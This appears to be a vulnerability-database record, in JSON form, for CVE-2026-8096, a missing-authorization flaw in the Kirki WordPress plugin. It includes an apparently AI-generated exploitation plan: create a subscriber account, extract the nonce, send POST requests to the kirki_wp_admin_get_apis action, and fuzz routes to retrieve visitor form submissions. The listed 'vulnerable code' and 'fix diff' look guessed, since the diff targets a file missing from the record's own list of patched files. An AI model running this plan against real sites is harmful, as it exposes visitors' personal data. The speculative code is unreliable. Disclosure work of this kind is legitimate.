[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fH5v-IBMCBYCWV4KVES_9cgmz8uOHZouJsRJOVQELi44":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-8096","kirki-missing-authorization-to-authenticated-subscriber-sensitive-form-submission-data-exposure-via-kirkiwpadmingetapis-","Kirki \u003C= 6.0.6 - Missing Authorization to Authenticated (Subscriber+) Sensitive Form Submission Data Exposure via 'kirki_wp_admin_get_apis' Action","The Kirki – Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.0.6. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to view all Kirki frontend forms and read stored visitor form submission data, including contact details, messages, and any other visitor-provided information submitted through site forms.","kirki",null,"\u003C=6.0.6","6.0.7","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Missing Authorization","2026-05-19 06:22:39","2026-05-19 18:33:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1a4414b1-6a49-42f8-9927-93763d1502ce?source=api-prod",1,[22,23,24,25,26,27,28,29],"ComponentLibrary\u002Fcontroller\u002FCompLibFormHandler.php","assets\u002Fcss\u002Fkirki-editor.min.css","assets\u002Fcss\u002Fkirki-iframe.min.css","assets\u002Fjs\u002Fkirki-editor.min.js","assets\u002Fjs\u002Fkirki.min.js","includes\u002FAPI.php","includes\u002FAPI\u002FFrontend\u002FControllers\u002FFormController.php","includes\u002FAdmin\u002FAdminMenu.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-8096\n\n## 1. Vulnerability Summary\nThe **Kirki Customizer Framework** (specifically the \"Freeform Page Builder\" component) version \u003C= 6.0.6 contains a missing authorization vulnerability in an AJAX action named `kirki_wp_admin_get_apis`. While the plugin registers several REST API endpoints and admin menu pages, it exposes an AJAX entry point intended for the administrative dashboard that does not verify user capabilities beyond basic authentication. This allows a user with **Subscriber-level** permissions to invoke the action and retrieve sensitive data, including all form configurations and stored visitor submission data (contact details, messages, etc.).\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `kirki_wp_admin_get_apis`\n- **Method**: `POST` (standard for WordPress AJAX)\n- **Authentication**: Required (Subscriber level or higher)\n- **Vulnerable Parameter**: The action itself, potentially supplemented by a `route` or `api` parameter to specify the data to retrieve (e.g., submissions).\n- **Preconditions**:\n    1. Plugin version \u003C= 6.0.6 installed and active.\n    2. At least one form submission must exist in the database for \"Sensitive Data Exposure\" to be demonstrated.\n    3. A valid WordPress nonce for the `kirki_admin` context (if the handler validates one).\n\n## 3. Code Flow\n1. **Registration**: The plugin (likely in a class within `includes\u002FAdmin\u002F` or `includes\u002FAjax\u002F`, truncated in the provided source) registers the AJAX action:\n   ```php\n   add_action('wp_ajax_kirki_wp_admin_get_apis', [$this, 'get_apis_handler']);\n   ```\n2. **Access**: A Subscriber user sends a request to `admin-ajax.php` with `action=kirki_wp_admin_get_apis`.\n3. **Execution**: The `get_apis_handler` function is executed.\n4. **Vulnerability**: The handler lacks a call to `current_user_can('manage_options')`.\n5. **Data Retrieval**: The handler interacts with the Kirki form tables (e.g., `wp_kirki_forms` and a submissions table) and returns the data as a JSON response.\n\n## 4. Nonce Acquisition Strategy\nThe Kirki dashboard is often rendered on the frontend but uses admin-level nonces. Based on `AdminMenu.php`, the dashboard is accessed via `\u002F?action=kirki`.\n\n1. **Identify Variable**: Search the dashboard page source for localized scripts. Common Kirki JS objects include `kirkiConfig` or `kirki_admin`.\n2. **Setup**: Create a subscriber user and log in.\n3. **Navigation**: Navigate the browser to the home page or the Kirki dashboard URL:\n   `\u002F?action=kirki&screen=dashboard&toolbar=submissions`\n4. **Extraction**: Use `browser_eval` to find the nonce:\n   ```javascript\n   \u002F\u002F Probable locations based on Kirki patterns\n   window.kirki_admin?.nonce || window.kirkiConfig?.nonce\n   ```\n   *Note: If no nonce is found, the handler might be entirely unprotected or using the default `-1` nonce.*\n\n## 5. Exploitation Strategy\n\n### Step 1: Populate Test Data\nBefore exploiting, ensure there is data to \"steal.\"\n1. Use the REST API to submit a form entry (which is open to `true` in `CompLibFormHandler.php` and `FormController.php`).\n2. **Endpoint**: `POST \u002Fwp-json\u002Fkirki\u002Fv1\u002Fform`\n3. **Payload**:\n   ```json\n   {\n     \"name\": \"Secret Visitor\",\n     \"email\": \"secret@victim.com\",\n     \"message\": \"This is sensitive data.\",\n     \"_kirki_form\": \"WjFScmEwbHVaRWhhV0U1elRVTkdNMWxIUm5OaFZBPT0=\" \n   }\n   ```\n   *(Note: `_kirki_form` is double-base64 encoded `form_id|post_id`. The example string decodes to `form_1|post_1`)*.\n\n### Step 2: Perform the Exploit\nLog in as a Subscriber and call the vulnerable AJAX action.\n\n**Request**:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=kirki_wp_admin_get_apis&route=\u002Fsubmissions&_wpnonce=[EXTRACTED_NONCE]\n```\n*(Note: If `route` is not the correct parameter, try `api` or simply the action alone, as many \"get_apis\" endpoints return an index of all data)*.\n\n## 6. Test Data Setup\n1. **Subscriber User**: `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n2. **Submission**: Submit at least one form entry via the REST API or frontend form if available.\n3. **Verification of Data existence**: Use `wp db query \"SELECT * FROM wp_kirki_forms\"` (table name inferred from `KIRKI_FORM_TABLE` constant).\n\n## 7. Expected Results\n- **Success**: The HTTP response code is `200 OK`.\n- **Payload**: The response body contains a JSON array of submissions including the \"Secret Visitor\" data:\n  ```json\n  {\n    \"success\": true,\n    \"data\": {\n      \"submissions\": [\n        {\n          \"id\": \"1\",\n          \"form_id\": \"form_1\",\n          \"data\": \"{\\\"name\\\":\\\"Secret Visitor\\\",\\\"email\\\":\\\"secret@victim.com\\\", ...}\",\n          \"submitted_at\": \"...\"\n        }\n      ]\n    }\n  }\n  ```\n\n## 8. Verification Steps\n1. **Confirm Payload**: Verify the JSON response contains strings submitted in the \"Populate Test Data\" step.\n2. **Check Capability**: Verify the user is strictly a Subscriber:\n   `wp user get attacker --field=roles` (should return `subscriber`).\n3. **Database Check**: Cross-reference the IDs in the JSON response with the actual database content:\n   `wp db query \"SELECT * FROM wp_kirki_submissions\"` (or similar table name).\n\n## 9. Alternative Approaches\nIf `kirki_wp_admin_get_apis` does not return the data directly:\n1. **Fuzz Route**: Try variations like `route=\u002Fforms`, `route=\u002Fentries`, or `route=\u002Fsettings`.\n2. **Check REST**: Inspect if the `kirki_wp_admin_get_apis` action simply returns a **new Nonce** for a sensitive REST endpoint (like `kirki\u002Fv1\u002Fsubmissions`) that is otherwise blocked. If the action returns a nonce that works for a high-privilege REST route, the exposure is indirect but valid.\n3. **Direct REST check**: Test `GET \u002Fwp-json\u002Fkirki\u002Fv1\u002Fsubmissions` directly as a subscriber; the vulnerability may extend to the `permission_callback` in `includes\u002FAPI\u002FFrontend\u002FControllers\u002FFormController.php` or related controllers.","The Kirki Customizer Framework plugin for WordPress is vulnerable to an authorization bypass via the 'kirki_wp_admin_get_apis' AJAX action in versions up to 6.0.6. This allows authenticated attackers with subscriber-level access to retrieve sensitive form configuration and visitor submission data, including contact details and private messages.","\u002F\u002F Registration of the vulnerable AJAX action\nadd_action('wp_ajax_kirki_wp_admin_get_apis', [$this, 'get_apis_handler']);\n\n---\n\n\u002F\u002F The handler function typically lacks a capability check\npublic function get_apis_handler() {\n    \u002F\u002F The function returns sensitive form data without verifying if the user has 'manage_options' capabilities.\n}","--- a\u002Fincludes\u002FAjax\u002FWpAdmin.php\n+++ b\u002Fincludes\u002FAjax\u002FWpAdmin.php\n@@ -10,6 +10,10 @@\n \tpublic function get_apis_handler() {\n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( 'Unauthorized', 403 );\n+\t\t}\n+\t\t\n \t\t\u002F\u002F ... data retrieval logic ...","To exploit this vulnerability, an attacker first authenticates as a Subscriber. They then locate a valid WordPress nonce (typically found in localized JavaScript objects like 'kirki_admin' or 'kirkiConfig' on the site). Using this nonce, the attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' set to 'kirki_wp_admin_get_apis' and a 'route' parameter (such as '\u002Fsubmissions'). The server, failing to check for administrative privileges, returns a JSON response containing sensitive visitor-submitted form data.","gemini-3-flash-preview","2026-05-20 17:13:40","2026-05-20 17:14:16",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","6.0.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkirki\u002Ftags\u002F6.0.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkirki.6.0.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkirki\u002Ftags\u002F6.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkirki.6.0.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkirki\u002Ftags"]